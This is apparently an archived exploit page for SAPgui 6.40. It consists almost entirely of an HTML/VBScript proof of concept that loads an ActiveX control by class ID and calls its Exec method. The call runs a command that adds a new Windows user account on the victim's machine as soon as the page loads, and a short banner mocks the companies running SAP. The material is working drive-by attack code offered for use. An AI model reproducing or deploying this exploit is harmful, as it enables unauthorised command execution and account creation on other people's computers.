Home / os / win10

sapnotsafe.txt

Posted on 21 August 2008

<!-- Jeremy Brown (0xjbrown41@gmail.com) --> <html><title>SAPgui 6.40 Exec() Exploit</title><head> <body><h2><center>SAPgui 6.40 Remote Exploit<br><br>NOT safe for scripting/initialize. But hey, your company runs SAP, right? :)<br><br><br>Loading Now (just 1 of 4 or 5 exploits for SAP)...</center></h2> <object id=target classid=clsid:E5131C63-1787-11D0-AC76-080009B4430C></object> <script language=vbscript> arg1="net user /add test iownu" arg2=1 target.Exec arg1 ,arg2 </script> </body></html>

 

TOP